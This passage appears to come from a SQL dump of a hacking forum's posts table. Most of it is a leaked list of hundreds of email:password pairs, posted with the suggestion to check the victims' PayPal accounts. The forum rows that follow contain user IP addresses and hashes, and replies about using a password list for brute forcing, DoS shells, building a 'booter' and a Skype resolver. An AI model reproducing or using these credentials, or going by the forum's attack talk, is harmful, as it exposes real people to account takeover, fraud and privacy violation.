hakim047@live.fr:welove10 greyhounder2005@fuse.net:fastdog2 hanna.luu@hotmail.com:pokemon2 hadipapu@ymail.com:9906117560 hannah.larkin@hotmail.co.uk:stjohnambulance gymgirl84@hotmail.com:cassandra10 gweeke@hotmail.com:April1908 guy_sos@iinet.net.au:just7doit hanibug@yahoo.com:hannah2524 hannahloveskittys@yahoo.com:rose1436 harrymcmartin@yahoo.de:vonderschlucht hariwizid@hotmail.com:demontfort1 happyrogger@mail.ru:58915050 georgie-kay@hotmail.co.uk:kay12345 hakamiah_88@hotmail.com:mercurio gootarfreek@yahoo.com:volcome123 harley95motley@yahoo.co.uk:poison95 hawaii888@live.com:jandg888 gsenan@hotmail.com:leicester haleybaleyjlo@yahoo.com:raindrops2 hannister01@aol.com:hannah95 haidercheema121@hotmail.com:haidercheema hawk_jazz92@yahoo.com:jazzyboo13 hatch@wht.mmtr.or.jp:bee04814 hatzixa@yahoo.gr:arianara Hansio1@yahoo.com:filmmaker hanbear7@hotmail.com:holdenuteal hattymail@hotmail.com:badger25 helen.dilworth@btinternet.com:thirteen7 hayleyfriedman@aol.com:machins1 heather@heathercavalier.com:elvis007 herbie@teamfca.com:ingodshands hermanmaradona@msn.com:maradona hbailon@hotmail.com:hectora1 helen101le@yahoo.com:09071998 heinrich@hudel.com:4680haag herbanmusic@hotmail.com:brunomarley heyherington@aol.com:doinitall hfatemi@ucla.edu:esfahan12 helenanathanael@aol.com:andreas3 giovanniteratani@msn.com:crashoverride Herc_reynyr2@yahoo.com:pearlinel h1993smithy@yahoo.co.uk:benjiman hestybesty@hotmail.co.uk:pinkiegirl hexgrl237@aol.com:heaven237 helen_ogubazgi@hotmail.com:123hello hellokitty122@yahoo.com:strawberry122 hellokittysmygf@yahoo.com:kittykins1 hikarimc_16@hotmail.com:sakura16 heylee@persona.ca:dakolton hillssk@yahoo.com:TheLodge69 hibabangash@rocketmail.com:bangash1 hbcase@att.net:dolly555 hello_kitty_81859@hotmail.com:crystal8 gsharp@masteranglersuniverse.com:Qwerty01 herline99@yahoo.com:1thebitch hollier8@sympatico.ca:14juillet horselover3345@hotmail.com:money3345 hotchick4693@yahoo.com:dvlana14 healthmatters@iinet.net.au:1492roth hot_boy3@hotmail.com:ilovepakistan hesoyam_pro9@yahoo.com:nuttertools hopesrocks@hotmail.co.uk:bhay2004 hot.chick_09@hotmail.com:marma123 hjhubbard@charter.net:bassett2 hkoutas@otenet.gr:iasonas100 hatinm@yahoo.com:fashion09 hotroxygirl4u@hotmail.com:comeonbabe heavenley18@hotmail.com:okla6552 hk_construction@sbcglobal.net:6111018hk hjbsoccball@yahoo.com:egregious hockeyrocks@telus.net:fleury14 heathercobb510@yahoo.com:lestat14 hunnib0503@aol.com:burgbabe harperalyssa@rocketmail.com:powerade44 horrorshow95@aol.com:loliepop21 hpresisniuk@telus.net:Bear2799 hostile-1988@o2.pl:26031988 hmody419-ayn@hotmail.com:as5921 hsarti@hotmail.com:06793751 heatherbarton11@hotmail.com:moonlight123 hyea_min@yahoo.com:jollyranchers htrigzy@verizon.net:sharon81 husinclair@mac.com:rangers1 hwsv07@yahoo.com.sg:8finzap4 hotty911119@yahoo.com:koolkat77 huskykid1995@hotmail.com:jenslehmann hottie_ranger_101@hotmail.com:nikiesha12 ianegsmith@me.com:twickenham idealsky1017@yahoo.com.tw:superfun1017 hunterheather92@aol.com:4heather hslall@ymail.com:harijio99 I_lost_it_here@hotmail.com:jeni1983 ibticem5@hotmail.com:24022002i hrbm@internode.on.net:chainsaw gmwalden05@yahoo.com:kevinspacy hmfacial@telus.net:dana1995 ilovebear33@hotmail.com:greeny21 ilja_74@hotmail.com:3kinders iannecho@yahoo.com:s0ybeans icetea4@yahoo.com:icetea65 i.heart.choo@hotmail.co.uk:iluffhimalways ifeklea@msn.com:lampard10 Imaginat@Imaginatweb.com:caleb3466 idontknow94@cox.net:purple94 iayogib@yahoo.com:the7chance icoles@talktalk.net:donkey29 highthomes@yahoo.com:clydecat hi_rajind@yahoo.com:rajatlko1611 ihtguitm@hotmail.com:prince55 ianhowe@tiscali.co.uk:milodog54 igallegosh@hotmail.com:Isr@2010 iloisel@yahoo.com:blueclover idashing23@yahoo.com:01092007 ihackedthisid@yahoo.com:z3r0h4ckz iluvtransformers123@hotmail.co.uk:Naruto123 infected_razor@hotmail.com:3rfxi5de4d ilyas55555@hotmail.fr:0688992682 indianguy_vicky4u@yahoo.com:nishagasti info@ggnwt.com:mj5121985 iluvswedishfish@live.com:star6868 ian_hadi_saputra@yahoo.com:basing152637 info@flamencotalk.com:Flamenco10 ilovebillyjoearmstrong3114@yahoo.com:gdisluv3 imfran@live.com.au:rosie2010 info@foodphone.com:daddy321 info@gogettergroup.com:2getinfo infernal.majesty@hotmail.com:dany2109 iluvnyc_11@hotmail.com:orlando10 info@atlanticaparty.ca:partyparty inkisidor_maestro@hotmail.com:36027082 ioriyoshizuki15@hotmail.com:villevalo1 i.srhoj@xtra.co.nz:paris205 info@nexo.de:metaluna irmon2983@yahoo.com.br:27011756 irmeli.kokko@welho.com:tellervo innante@yahoo.com:copyright iri_fun4all@yahoo.com:123bamboocha irenemisol@yahoo.com:50879657t irva2.0@earthlink.net:beauty46 itcenter@in.com:28163366 info@printwell.com.mt:castro9753 ivancemitic@live.com:buntovnik itsarunyar@yahoo.co.in:shavaks iover313@yahoo.com:burninh3ll ipyla@tee.gr:txmdetora isabellerouleau28@hotmail.com:7294rach iwalker4u@hotmail.com:2469wdwl ines_sika_1991@hotmail.com:19531966 itz.kodi@yahoo.com:STARWARS13 ironeagleuk@hotmail.com:opus3861 j_arbesu@hotmail.com:che-00media italianbadazz93@msn.com:army33 j_jayne723@hotmail.co.uk:Millie723 jaay86@yahoo.com:9840047057 jackieissowackie@yahoo.com:ilovedot1 j2183356@yahoo.com.tw:a3662844 info@ordoton.com:12sudden j222666996@yahoo.com.tw:forever96 j.gonzalez93@hotmail.com:loquesea1 jadelevin@hotmail.com:hamster1996 jacyln_loo91@hotmail.com:jacyln1207 jackie.carmichael@hotmail.com:lexibaby j.hagens8@hotmail.com:Harald05 jai_alai6@hotmail.com:jaikoizun jaishaholmes@hotmail.com:jstorm97 jackiebragg@btinternet.com:lanzarote iv4e_manutd@hotmail.com:ivomanutd jackie_appleby@hotmail.com:pigme123 jade12316@yahoo.com:loveme11 jaepdesignz@live.com:fresh101 ismahsyarafina@ymail.com:dafahani jackiecronin66@yahoo.co.uk:liberty5 jadeyboots@hotmail.co.uk:curran123 ixluvxmusic123@yahoo.com:dacss123 jack.rickman@yahoo.com:stroman88 jaala_jm95@hotmail.com:maggie95 jakub@drnec.cz:22peta7 jaelynboisrond@yahoo.com:boisrond janicelee@hotmail.co.uk:cherry1956 jamt29@msn.com:Yamazaki29 jalapenolady45@yahoo.com:130cars issidore13@yahoo.com:denebadighe irakaz1@yahoo.co.uk:gustavus janine.pratt@bigpond.com:ljm3barron62 jana_hernandez@msn.com:milkyway1596 janni29uk@yahoo.co.uk:sorry123 jazz.321@hotmail.com:jazza321 jamayne12@yahoo.co.uk:Tessa19october jasonghostman@hotmail.com:jessicaking1972 jade_burton1@hotmail.co.uk:pwincess jason.crowe@ipgonline.cc:eliminator jasper.hillebrand@hccnet.nl:tristen1 jay_nil10@yahoo.com:bhumika89 jazmincortez83@yahoo.com:1lovelife jcam1231@yahoo.com:cocolisious jbrandon52@centurytel.net:glenda52 janiertaylor@yahoo.com:joseph01 jbenard@hmssoftware.ca:jul*ben jaysmom00@yahoo.com:robert68 itstazhjayebxtch@yahoo.com:thebest@ jaydewtf@live.co.uk:hamishx1 jbcendana@yahoo.com:chiranjivi jecs@earthlink.net:liptude jane1309@live.co.uk:callum8903 jcrj100@bellsouth.net:rollride12 jburt@port-a-cool.com:portacool jenine0044@yahoo.com:ningning jdmarchilla@yahoo.es:ESTANBUL jehad-1987@hotmail.com:skyline77 jdhua@aol.com:828334hua jenniferlynn111595@hotmail.com:nov151995 jelie_bean19@yahoo.com:03191996 jembob_80@hotmail.co.uk:Kumagoro28 jenniferlord@live.com.au:cillian50 jess_luvs_music@hotmail.com:jeslove!! jeanniehoward@hotmail.co.uk:mckenzie08 jessica.giberson@yahoo.com:petecat3 jeniades@hotmail.com:unamun0 jecigo2007@hotmail.com:MEHS610105 jenevapat77@yahoo.com:buddyboy11 jennifer26gregory@yahoo.co.uk:honey339 jay_plane_@hotmail.com:jayplane jennifer1354@hotmail.com:apple616 janie_jones91@yahoo.it:THECLA5H jesmc24@yahoo.com:sweetmaci jessicahanson83@hotmail.com:emmalee123 jerrymabo@hotmail.com:ilw67128 jamessheep@hotmail.com:rosscounty69 jerica333@yahoo.com:pupismelter Jenna1.patel@btinternet.com:jenn1996 jennyynp@hotmail.com:19940423 jessy-buzzin-2k7@hotmail.co.uk:jessica2k7 j-fleuti68@orange.fr:nicotine jenarocks17@aol.com:breezymae jessica.louiseX@hotmail.co.uk:flower666 jim.g1316@yahoo.co.uk:dunedin1316 jackmar58@hotmail.com:michaelj jhonphil143@yahoo.com.ph:paramjit8 jenniferlynn1115@aim.com:nov151995 jimmystix@nycap.rr.com:stampede1112 jillchanter@msn.com:giddykip jesus_cena@hotmail.com:sagradacena jjdiazarochi@yahoo.com.mx:spell2005 jhawk61@hotmail.com:greenhawk jlihancock@hotmail.co.uk:jennifer13 jlyemen@yahoo.com:jy1383msk jim@dreamweavertv.com:oct0ber16 JL7172@ATT.NET:LORA5672 jess.lc@hotmail.com:0801bohemianfc jenai_t@sbcglobal.net:jenai2002 jgold2@verizon.net:j2257721 jkeel16@aol.com:bridget20 jn3b@hotmail.com:azerty jicrw@hotmail.com:shankill jmclaren@wightcablenorth.net:jenny1973 jladiva01@yahoo.com:momma012798 jmyboyz@aol.com:bradman1 jodie.shepherd@live.com:Ginger22 joa.74@hotmail.com:Lolita123 jmgelx@hotmail.com:ilicitano joanwalko@comcast.net:athena92 jmab@batelco.com.bh:enero220 joerumsey@ec.rr.com:a03311942 joanne_muncic@hotmail.com:kokica87 joannearmstrong00009@yahoo.com:jo26may1 joekoontz@post.harvard.edu:jkpk9060 jinta_210691@hotmail.com:fzrkadn5 joanne_chin26@hotmail.com:09041994 jmt_yee@hotmail.com:keswickk john.hrycak@sympatico.ca:531106jh jodyjay@pacbell.net:10500552 JODYCASBARRO@MSN.COM:thankful joetaaffe@hotmail.com:rannafast jockels@gmx.net:charlinka jiminium@netzero.com:lasv9090 jomali@internode.on.net:zoepan99 joanneparenteau@sympatico.ca:s8vb8bsnow jhielle@yahoo.com:kayekiel joannekarlsson4@hotmail.com:wang0111 jocelynsaccuci@yahoo.com:Lovebugs johnboonstra@msn.com:seyeona1 johnnynavarro1983@hotmail.com:silvia jojo1258@hotmail.com:surestart1 jeraldine_zamora@yahoo.com:jhezam77 Jordi_vv@msn.com:lionheart joepeach56@yahoo.com:007jcp johnkoz9528@yahoo.gr:21112111 jojolil@hotmail.co.uk:jubjub789 jordan290288@hotmail.co.uk:gullane1 jordyn_g_93@hotmail.com:bratzgirl john01one@yahoo.co.uk:Ace9901one johnpfernandes@hotmail.com:jsun0521 jon_lindsay@mac.com:Dseven777 jorge_boquete@hotmail.com:barbarie2006 johntang80@hotmail.com:undercover John.Bernardi@intaglio-info.com:2twins2 johnc@cornsilks.com:tinyttc1 jordynn21@aol.com:bigbear12 josejuan16@hotmail.com:psilva18 josetter@nb.sympatico.ca:5252104 jeromeberthoud@orange.fr:poulet98 jennifer_wilder@live.com:Coco-Bean josecampisi@hotmail.com:joancafe jo-is@bluebottle.com:10elephants jonathangprice@live.com:Jpri2307c5 josh@zatland.com:15481548 john_mix2001@yahoo.com:ranjithrocks joshuagadd@hotmail.com:nerfgun202 joseatrejos@hotmail.com:jats12345 Jracer82@aol.com:nov231982 josylicious09@yahoo.com.mx:tampico123 jorge_a_castillo@msn.com:29101178 jrredford@btinternet.com:Snuggles1 jsfree@bellsouth.net:peenutty57 joannamj1@yahoo.com:mysondouglas jremparan@ilsalle.org:joserrae jonn5335@yahoo.com:johny007 judoman02@msn.com:er654855 judyew46@yahoo.com:spencer5967 jones_madeleine@yahoo.com.au:laughter2 judyjarvishome@ozemail.com.au:walhalla julie1303@hotmail.com:mtgore97 julieannvg@yahoo.com:darkfairy1 jupiter_104@hotmail.com:shaz1987 jessicapacey-@hotmail.com:emendation julianna.battaglia@yahoo.com:bestfriends3 juanionline@hotmail.com:fabuloso JULIEANNAYOGA@SBCGLOBAL.NET:peacenow justbeingrobyn@hotmail.com:casandra1 jully12123@hotmail.com:sshhyy920023 justinpurdon@hotmail.co.uk:windowsXPpro jtsbluesband@yahoo.co.uk:oldnevada1 juan_grc@hotmail.com:ventila2 joelydicks@hotmail.co.uk:Sparky3890 justinmarkl@aol.com:marconi juliamifsud@hotmail.co.uk:01091994 justplastering@justplastering.com.au:chachi27 kabelomashumba@yahoo.com:ktmgrace12 joygallen@msn.com:changes12 juanbiedma@msn.com:peugeot405 jzmn_nv@yahoo.com:sweetcupcake k_soutter@hotmail.com:46zoey64 kaeladancer@comcast.net:ba11et12 Kaitlinbdavis@embarqmail.com:josie310 jwpines@juno.com:sally1 jrichardjohnston@btinternet.com:theresa82 k_bircham@hotmail.co.uk:katley96 kairambling@yahoo.com:kaibaby96 karinek94@hotmail.fr:15061983 juliarm@comcast.net:thomas1989 karaj2us@yahoo.com:1328girl kacey_rulez_1998@hotmail.com:mining05 kanoscar@yahoo.com.hk:918273640440 kabirsafi_1@yahoo.co.in:namitasafi kara.therrien@hotmail.com:petewentz karin_vatnehol@yahoo.no:gunnhild karma8003@live.com:snowgirl jyotidekap@yahoo.co.in:kolija4680 kaiser.jillani@live.com:jill28jan karnimundhra@yahoo.com:9864515475 karenla62@hotmail.com:charlie1980 jmc512@zoominternet.net:082994 just_a_girl_in_nyc@hotmail.com:backstab1 kat609hey@live.com:katelyn6 karlsson.tommy@comhem.se:Gripen08 karap93@aol.com:kplummer1 karenob57@hotmail.com:herr1234 kateske_6@hotmail.com:gnarkill kaloutsis16@hotmail.com:98156274 katya.villaviray@yahoo.com:captaincho02031988 kate_lee1983@yahoo.com:12345678pp katrinananto@yahoo.com:catdog123 katsillitoe@hotmail.co.uk:kitkat23 katee182@hotmail.co.uk:Br00me27 katiaus@hotmail.com:defeop12 kawlovescookies@msn.com:moonmagic karencalder86@hotmail.co.uk:tigercat22 kaylabrewer@rocketmail.com:charming1 karen_antiquera@yahoo.com:051591kha kate@indigo.ie:lfaly789 katherinekober@aol.com:kober123 Katiepanda00@hotmail.co.uk:princess66 kathrynrose17@msn.com:tigerboy kboulaka@hotmail.com:samaki2002 kaz238@hotmail.co.uk:reks130109 kayjay914@hotmail.com:sedona01 ke_jo_ja@yahoo.com:sssghtd123 kaycebear@yahoo.com:cheer123 kaylakayla1231@aim.com:sexybitch456 katies_snakes@hotmail.com:eloise45 keely_rox18@hotmail.com:pumpkin18 kayleerudd@yahoo.com:buddyboy kaymonster72@yahoo.com:jesse123 katiebears101@yahoo.com:oscar101 katrina329b@yahoo.com:K218199y keensus@yahoo.com:dragon4life kayfir@aol.com:kath3r1n3 katiejgirl@yahoo.com:dolphins10 kazaf_ming@hotmail.com:24241609 kellyn_tink15@yahoo.com:princess* Kenarf@aol.com:toggle kelseyprincess111@hotmail.com:SunShin1 ken@betterhomecleaning.com:bluegoose kbkdcfan8@yahoo.com:kabaz418 katherinepiano@yahoo.com:soccer93 kalyn2008@yahoo.com:trubeauty1 kenfLee23@tmail.com:aponte23 keeshawndagoodnight@yahoo.com:shawnda14 kass@huntel.net:katm5517 kevinstocker03@aol.com:freddie13 kgallagher_88@yahoo.com:maddog88 kesi66@hotmail.com:chupalos khadidiacissoko@aol.com:crazylove4 kevpollitt@hotmail.co.uk:lisa3103 kenz_fern@hotmail.com:38766381 kenisak@hotmail.com:karoline khitchen@me.com:zeslee10 keyearrakhamari@yahoo.com:lolabunny1 kezia_brewer@hotmail.com:chalahn86 khlariejoybautista@yahoo.com:mother56 kevinm50@comcast.net:1armydad kerry18@bigpond.net.au:peanuts5 joshh071@gmail.com:moosehead mas1218@gmail.com:CaSSius1218 maclean.tom@gmail.com:Hyper10N lov2killu@gmail.com:1l0vey0u matin31421@gmail.com:ilsirisha matto2575@gmail.com:mattoman jkeogh71@gmail.com:toasty10 mathsgeo@gmail.com:473iloveyou luv4grammie@gmail.com:grammie4luv mloganc@gmail.com:4948731123 krishna27in@gmail.com:ramgokul luv4lady@gmail.com:scater009 moe199710@gmail.com:bearlover2 naughtylaila@gmail.com:laila123 naveensourav@gmail.com:godfather pavan4mydarling@gmail.com:ap24j1777 paul.beauchamp@gmail.com:wendover1 pindifferent@gmail.com:jack75 ppn2max@gmail.com:socrattila pravand@gmail.com:15399351 praveentm2007@gmail.com:idukki137 raanandaarthy@gmail.com:bheemaanand ragavan.1947@gmail.com:bagalur rajan.rajan.rajan42@gmail.com:sundarrajan rajanikk19@gmail.com:asasas rajeshkanchi572@gmail.com:aishwarya rajpootkumarajeet88@gmail.com:9958844406 rakenthr87@gmail.com:sexfriends ramyaisstar@gmail.com:9844198441 rash.hot@gmail.com:rash2306 rcrajamainframe@gmail.com:18011986 red4raj@gmail.com:9346843597 relayplay99@gmail.com:dreamgirl Reneesh828@gmail.com:9947389946 rexinshon@gmail.com:rexin123 rockergurl313@gmail.com:bebreezy01 rppatel666@gmail.com:panthalattil sagarpradhan2009@gmail.com:9776225782 Salimsaleem786@gmail.com:203273 samplemailer1@gmail.com:mailergmail sandipdas86@gmail.com:02101973 sandrakibandra@gmail.com:fea92ahd sans.ny@gmail.com:ecolika sarayudreams@gmail.com:sarayu123 saries75@gmail.com:soumen75 sedullos86@gmail.com:Players4life shortmarien7@gmail.com:webkinz101 najeebm84@gmail.com:rahmathnisha plordou@gmail.com:titathe1st qazimdoda@gmail.com:doda0207 rishisarank@gmail.com:9598543 scrittore.ragazza@gmail.com:luckychance seema89123@gmail.com:93239752 sekharanraja77@gmail.com:devarajan shilparoy1988@gmail.com:arpitanibedita shubam.acharjee@gmail.com:roommates prakhar.srivastava73@gmail.com:40504050 rohit.fkr@gmail.com:Choose a password rajeshpatrodr@gmail.com:monapupun prg1006@gmail.com:kukshisusari razaabid9@gmail.com:Ar201070 rohitsupat1519@gmail.com:26090745 sanjaymahaver@gmail.com:9928292347 rockawaybill@gmail.com:clancy1706 rajeshkarnataka@gmail.com:hassanjavagal sekar.bsc55@gmail.com:9790436355 rvd.lakshmi143@gmail.com:9246644141 sarath132009@gmail.com:9941179078 sandeep29880@gmail.com:ninumama pawan25patna@gmail.com:9845346661 Rahul.hydmba@gmail.com:siebelsimham pkonline14@gmail.com:ahsanaaa niebla.p@gmail.com:vertebra r.gopi.mech15@gmail.com:gopinath060002 rcastelo2007@gmail.com:xanie88 noman.ali.abbasi@gmail.com:abbasi78663 narayanan123400@gmail.com:kaverisingh rodomysl27@gmail.com:kremilek27 pratheep025@gmail.com:861462919 pete.hanratty@gmail.com:008859 pinkfawn209@gmail.com:1985live narcisaiv@gmail.com:13101974 nitinbscit@gmail.com:17968159 rpreddy369@gmail.com:9989888369 njm.zafar@gmail.com:45268191 ruiz1958@gmail.com:santosfc raj.dipak@gmail.com:nokia3220 s.anandhassan@gmail.com:thegameison sampulsar18@gmail.com:samrockseverywhere psn20042001@gmail.com:simran sashankb51@gmail.com:282039 noopuragarwal24056@gmail.com:usenthrow ramssiru@gmail.com:sirumugai sarkar.jayanta@gmail.com:jayanta01 pedro.lagoela@gmail.com:pr0088lago programmingservices.ht@gmail.com:hitech12 shh.sugu@gmail.com:sugu1985 philip.dragoumis@gmail.com:wpelican pandajsr@gmail.com:panda123 rehan.pari@gmail.com:9825619003 pramsnr@gmail.com:251142 prasobh917@gmail.com:9747367917 poolguy24@gmail.com:pa55w0rd sahilcool1994@gmail.com:sahilmunshi ravikhatrilovesu@gmail.com:BravoAco11 poiteviencarlos@gmail.com:TMOPASGT noor198499@gmail.com:naseemjabeen niraj85shah@gmail.com:gatudarling rafiqaalaayi@gmail.com:teampower pyemabraham@gmail.com:maar666999 sagarkakad007@gmail.com:s@g@ruk409 shahe7005@gmail.com:mahsoodd5 pcmpal@gmail.com:pal007 nasirequbal14@gmail.com:14119918 raseeth.06@gmail.com:hteesar6 niatmir.nestle@gmail.com:ya123456 rvndr8@gmail.com:xiphias0101 phoenix.hayhay@gmail.com:fcmonkey123 s.rajakumar.be@gmail.com:sbvr1234 ridagold@gmail.com:rickyhot premkumargaddala@gmail.com:bujjigadu[/quote] [/spoiler] You can use this info to check their Paypal for some $$ or some accounts, etc. Don\'t know what you wil find on the emails. Good luck. Unchecked/Untested.', '24.212.197.164', '416597412', '1', '0', '82', '1349051758', '1', 'a5459c2361eafd735b736d943a463e93', '0', '1349051758'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3057', '632', '3056', '61', 'RE: 1000 Emails Dump', '0', '9', 'p420', '1349051768', 'FUCK!! That\'s hell of a lot logins thanks.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '6184e81e47a328bf0be94ca23d79bbd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3058', '482', '2343', '61', 'RE: 3 Million Password List', '0', '9', 'p420', '1349051800', 'We can use this for brute forcing right?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9f454785e71c498faf0e6ad5fc1f11fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3059', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '9', 'p420', '1349051833', 'Thanks im planning to make a online booter.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e0984fde4797febad878cd413f19ba2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3060', '633', '0', '19', '[Junk]JOKER!!!!!!!!???????!!!!!!!!!!', '0', '3', '??????????¢™', '1349051866', '[b]HAHAH LOOK AT JOKER[/b] [spoiler][img]http://thefatbrat.com/wp-content/uploads/2012/01/face.png[/img][/spoiler]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'dca97bda8c3d4ac8d69650bad5d9197a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3061', '610', '2971', '61', 'RE: Free Skype Resolver - Fast Resolve!', '0', '9', 'p420', '1349051871', 'Link is dead. Please fix the link.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a63d88bbe9c62238bee841b08737a57b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3062', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349051978', 'http://l33thacking.net/thread-534.html', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'f42aa9f4c63a55f240d694f80ab20e7d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3063', '574', '2818', '61', 'RE: Clean Thread Design', '0', '9', 'p420', '1349051980', 'I think you should provide some credits and nice guide.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '20d23e5b8b2f6431d87ed78349158481', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3064', '633', '3060', '19', 'RE: JOKER!!!!!!!!???????!!!!!!!!!!', '0', '1', 't3h jok3r', '1349052027', 'Lol you made a laugh. Who\'s next to me? YOU!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1537672d5dd6627cf9e577fa139cb25e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3065', '633', '3060', '19', 'RE: JOKER!!!!!!!!???????!!!!!!!!!!', '0', '3', '??????????¢™', '1349052066', 'LMFAO [hr] This thread has been junked.', '75.35.239.228', '1260646372', '1', '0', '3', '1349052070', '1', 'badd4155a376dfc7239de18b49530eb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3066', '574', '2818', '61', 'RE: Clean Thread Design', '0', '82', 'iTzIpod', '1349052109', 'Thanks :p I\'ll take that under consideration xD Jk. I\'ll add them tomorrow if I don\'t forget.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d87717dab011cb9f8964e158744ea8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3067', '632', '3056', '61', 'RE: 1000 Emails Dump', '0', '82', 'iTzIpod', '1349052152', 'No problem! Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '80c6fab32b51e68ecf7d707d4da96f2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3068', '482', '2343', '61', 'RE: 3 Million Password List', '0', '82', 'iTzIpod', '1349052186', 'Yes you can. That\'s basically the reason why I just uploaded that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cfb016f3e262b23455cde757924ada0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3069', '610', '2971', '61', 'RE: Free Skype Resolver - Fast Resolve!', '0', '82', 'iTzIpod', '1349052243', 'My friend told me it was DDoSed. So that\'s why it\'s down.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8bf18f34c5257cfeafe4102c41eae596', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3070', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349052284', 'Lol GRONGamer61 will need that :p He wants to test my shells.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc83ab9cbeca353d511d768b9808e423', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3071', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349052320', 'http://37.128.191.200/ :p Was giving this out to a friend.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8ce570ac4c3016ccd93aea11e691e61e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3072', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1349052495', 'gavmaXXX Someones Skype ID :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cca975030bfcd49fba6cca0d3895ffe7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, 